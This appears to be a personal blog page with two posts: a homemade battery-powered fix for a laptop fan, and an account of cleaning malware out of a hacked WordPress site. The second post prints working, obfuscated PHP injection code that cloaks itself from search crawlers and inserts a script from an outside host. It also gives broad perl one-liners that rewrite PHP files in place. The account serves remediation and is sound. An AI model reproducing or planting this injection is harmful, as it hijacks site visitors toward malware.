Monday, May 17, 2010

Time-Pass Engineering

It was just a month passed after warranty of my Latitude laptop had expired and cpu fan stopped cooling processor of laptop. It was good i realised it before else laptop's processor would have melted some day. Very next day of this realisation i called up Dell customer care and asked for replacement of fan, customer care executive did some troubleshooting steps with diagnostic disc supplied with laptop and came to a conclusion that fan has to replaced. He promised me to send quotation for fan in few days. After some days i got an email saying that product(fan) is EOL, so they can't supply it anymore. I was not able to use my laptop just because of this, just because i was having another laptop given by office, it was not a trouble for me.

Some weeks later i opened my laptop and took out cpu fan out. my plan was to get it repaired with help of some electrical shop, meantime i got some information about some laptop repair shops. At one shop i was told that fan can't be repaired but they can get same fan within a week, but later after two weeks shopkeeper refused as he was not able to find one for me. I tried another shop he kept fan for three days and finally called back to me saying fan is working. He asked me to get motherboard and offered me to fix this. I was not willing to leave my machine at his shop and he refused to repair it in front of me. I got the fan back and thought to get it fixed later with someone else.

Once again i called up Dell and told them it not fan but the power connector of on the motherboard which is not supplying any power to fan. Last weekend i was not having any plans, and because of hot sun outside i don't wanted to got outside my room. I checked power requirement of the fan it was 5.0 volt. With an idea of checking it i bought three pencil cell battery each of 1.5 volt. With help of a thin wire i connected battery with the fan wires and finally i saw fan in working condition. Here i started my mind's engineering capability to fix the fan. 
I connected two wires to the power connector of the fan and made it pasted transparent tape on it so that it doesn't create any short-circuit with motherboard. then i found a place to keep two batteries in inside the laptop body. I could have done some more research on the motherboard to find a suitable point where i can get desired voltage for the fan  but unfortunately i was not having any multimeter kind of device to check the voltage coming out from various available points on the mother board and also. Then i though if i fix the fan directly to the batteries it will remain in always-on situation and batteries will die soon. Now i was thinking to purchase a small switch button to control the fan. Looking at the datacard panel on the board i started mechanical engineer portion of my mind. Have a look on the pictures next.
This picture above shows switch in off state

This Picture above shows switch in on state

If you observe carefully you will see a black plastic stick purpose of stick is too push out internet datacard which i don't use in my laptop as i have USB wireless modem. I pasted one wire to this stick and other wire to the iron plate with help of adhesive, this was most time taking task as it needs to be done with complete perfection finally switch is ready, all i have to do is pull the stick out to make circuit on and push it back to turn off the circuit.

Next i carefully fixed the batteries and aligned the wires so that they don't cause any hindrance while closing the laptop. I fitted back all the components carefully and was ready to boot up my machine.

Just to keep an eye on the fan's working i enabled temperature monitoring widget on my fedora desktop. though i dont find any option to raise a sound alert in this applet, may i have sit another weekend and look into code of this fedora desk widget to have an option of setting a sound alarm when temperature goes higher than a certain point.

Saturday, May 8, 2010

When WordPress Site was Hacked

Long time ago i opted to read news online avoiding wastage of newsprint and i bookmarked various news websites for reading news daily morning, and it became habit to checkout bookmarked websites early in the morning. Yesterday morning when i opened one of bookmarked website for news about himachal website was redirecting me to some interesting page, and this page was offering some exe for cleaning up virus from my computer. how funny .... site was saying me to clean virus from my linux laptop.. ha ha ha.. 

Investigating more about websites i found this was happening from the server side, i passed on a message to the website owner, as he was known to me, saying that something is breaking on his site. Later i got a call from website owner saying that some malicious code is added to each page on the webserver. Here is the code he has sent 
----code begins here----

<?php /**/ 
----code ends here----
here is the expansion of decoded string 
----expansion starts here ----
:if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly96ZXR0YXBldHRhLmNvbS9qcy5waHAiPjwvc2NyaXB0Pg=="); } return ""; } } if(!function_exists('gzdecode')){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }
----expansion ends here----

Well it will take some more time for me to understand this. later i was given shell access to this web server to check out the problem.. I used perl to remove this code from the php file ..

perl -p -i -e 's/.*=="\)\);\?>//g'

but this was not enough, website was giving errors even after this. It was hard time prior to this website was redirecting but now website was getting displayed without css, at this time i was more worried whole website was looking very ugly, I called up website owner and call was a relief for me, i was feeling owner might be unhappy with me for giving this ugly look to his website but his was calm which motivated me. Struggling some more with the php files for some other malicious code, I checked out error logs and found there was some problems in sending php headers, and i immediately remembered my college days when my php project stopped working because of one empty line was added in the login page. 

so i again executed following perl command to cleanup the empty lines.
perl -p -i -e 's/^\n//g'

and website was up again. 

here is the piece of code which can fix similar problem in one go, all you need to do is move to root directory of your webserver and execute

for i in `find ./* -name "*.php"`;do  if [ -f $i ];then perl -p -i -e 's/.*=="\)\);\?>[^.]*//g' $i ; perl -p -i -e 's/^\n//' $i ; fi done;

I have to use two regular expression as newline character was giving trouble to me. i would like to mention this expression will work for the above mentioned malicious code, you may have to tweek the expression if you have some other malicious code added to your word press site.

If you don't have shell access to webserver other solution to such problem can be updating wordpress, if you already have the latest version you get option of reinstalling wordpress which actually replaces all the affected php files and your affected php files with malicious code will be removed automatically. In case you you have custom theme you have to update your theme files also and also the plugins you are using in your wordpress site.

I am still confused how hacker was able to add this php code, as i dont have sudo access on the webserver could not get more things for you, will try to detect it somehow.. 

Happy Wordpress people.. Happy Open Source..